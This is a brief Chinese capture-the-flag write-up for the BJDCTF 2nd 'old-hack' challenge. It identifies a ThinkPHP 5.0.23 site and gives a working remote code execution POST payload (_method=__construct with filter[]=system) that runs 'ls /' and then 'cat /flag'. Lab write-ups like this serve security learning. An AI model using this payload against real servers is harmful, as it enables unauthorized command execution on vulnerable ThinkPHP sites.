[BJDCTF 2nd]old-hack_thinkphp漏洞

[BJDCTF 2nd]old-hack_thinkphp5漏洞 進入頁面提示是thinkphp,先構造一個報錯 然後看到版本爲THINK_VERSION5.0.23 然後百度查詢漏洞: payload:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST提交嘗試一下,發現可行,然後就cat /flag
相關文章
相關標籤/搜索